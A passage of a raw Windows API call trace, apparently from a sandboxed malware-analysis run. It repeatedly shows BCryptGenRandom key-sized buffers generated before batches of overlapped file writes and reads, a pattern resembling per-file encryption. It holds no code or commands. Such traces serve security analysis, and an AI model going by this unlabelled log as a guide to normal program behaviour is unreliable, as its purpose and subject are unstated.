0x1fa2ed8 [0146.825] free (_Block=0x1fa91d0) [0146.825] free (_Block=0x1fa2ed8) [0146.825] free (_Block=0x1fa90b8) [0146.825] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.826] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.827] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.827] CloseHandle (hObject=0x3cc) returned 1 [0146.828] free (_Block=0x1ff1e60) [0146.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.836] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.836] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.836] free (_Block=0x3e305b8) [0146.836] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.836] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.836] free (_Block=0x1fa91d0) [0146.836] free (_Block=0x1fa2ed8) [0146.836] free (_Block=0x1fa90b8) [0146.836] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.838] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.838] CloseHandle (hObject=0x3cc) returned 1 [0146.838] free (_Block=0x1ff1e60) [0146.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.846] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.846] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.846] free (_Block=0x3e305b8) [0146.846] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.846] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.846] free (_Block=0x1fa91d0) [0146.846] free (_Block=0x1fa2ed8) [0146.846] free (_Block=0x1fa90b8) [0146.846] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.848] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.848] CloseHandle (hObject=0x3cc) returned 1 [0146.848] free (_Block=0x1ff1e60) [0146.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.859] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.859] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.859] free (_Block=0x3e305b8) [0146.859] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.859] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.859] free (_Block=0x1fa91d0) [0146.859] free (_Block=0x1fa2ed8) [0146.859] free (_Block=0x1fa90b8) [0146.859] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.861] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x85d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.862] CloseHandle (hObject=0x3cc) returned 1 [0146.862] free (_Block=0x1ff1e60) [0146.862] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.869] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.869] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.869] free (_Block=0x3e305b8) [0146.869] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.869] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.870] free (_Block=0x1fa91d0) [0146.870] free (_Block=0x1fa2ed8) [0146.870] free (_Block=0x1fa90b8) [0146.870] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.872] CloseHandle (hObject=0x2a4) returned 1 [0146.874] free (_Block=0x3df0008) [0146.874] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.880] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x31d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.880] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.881] CloseHandle (hObject=0x3cc) returned 1 [0146.881] free (_Block=0x1ff1e60) [0146.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.888] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.888] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.889] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.889] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.889] free (_Block=0x3e305b8) [0146.889] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.889] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.889] free (_Block=0x1fa91d0) [0146.889] free (_Block=0x1fa2ed8) [0146.889] free (_Block=0x1fa90b8) [0146.889] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.890] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1d10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.890] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.902] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x30f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.903] CloseHandle (hObject=0x3cc) returned 1 [0146.903] free (_Block=0x3df0008) [0146.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.935] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x560, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.935] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.946] CloseHandle (hObject=0x3cc) returned 1 [0146.947] free (_Block=0x3df0008) [0146.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.959] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb66e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.973] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x54d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0146.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.997] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2c84, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0147.005] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0147.008] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0147.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0147.010] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.010] free (_Block=0x3e305b8) [0147.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.010] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.011] free (_Block=0x1fa91d0) [0147.011] free (_Block=0x1fa2ed8) [0147.011] free (_Block=0x1fa90b8) [0147.011] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0147.017] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0147.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0147.052] CloseHandle (hObject=0x2a4) returned 1 [0147.052] free (_Block=0x1ff1e60) [0147.052] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0147.056] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xb594, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.057] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0147.186] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3888, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0147.438] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x907d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0147.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0151.986] CloseHandle (hObject=0xec) returned 1 [0151.986] free (_Block=0x3e70008) [0151.986] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0151.995] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.995] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0151.995] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.996] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0151.999] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0151.999] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0151.999] free (_Block=0x3e305b8) [0151.999] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0151.999] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0151.999] free (_Block=0x1fa91d0) [0151.999] free (_Block=0x1fa2ed8) [0152.000] free (_Block=0x1fa90b8) [0152.000] WriteFile (in: hFile=0x2a4, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0152.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.008] CloseHandle (hObject=0x2a8) returned 1 [0152.009] free (_Block=0x3ef0008) [0152.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.016] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xa50e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.029] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0152.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.029] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0152.030] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.030] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.030] free (_Block=0x3e305b8) [0152.030] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 